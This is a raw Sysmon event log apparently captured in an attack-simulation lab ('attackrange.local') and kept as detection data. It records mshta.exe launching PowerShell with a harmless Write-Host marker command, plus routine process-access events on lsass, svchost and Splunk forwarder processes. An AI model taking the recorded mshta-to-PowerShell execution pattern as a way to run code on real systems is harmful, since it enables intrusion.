15:59:11.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:11.335{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-534F-6008-1D06-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:11.335{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-534F-6008-1D06-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022130Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:11.336{7901BC46-534F-6008-1D06-00000000A301}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.554{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.554{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.523{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.523{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000022226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.476{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wbll0tuh.ekr.ps12021-01-20 15:59:12.476 10341000x800000000000000022225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.460{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.413{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.413{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.413{7901BC46-5350-6008-2106-00000000A301}56647964C:\Windows\system32\conhost.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.413{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.398{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.398{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.398{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.398{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.398{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.398{7901BC46-5350-6008-1F06-00000000A301}58647192C:\Windows\System32\mshta.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.412{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 6cda27da-17d1-4090-9acf-b86eee7d514d; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\dsdfsiuhsdrfsawgfds" 10341000x800000000000000022213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.335{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.335{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.335{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.335{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.320{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.320{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.288{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.288{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 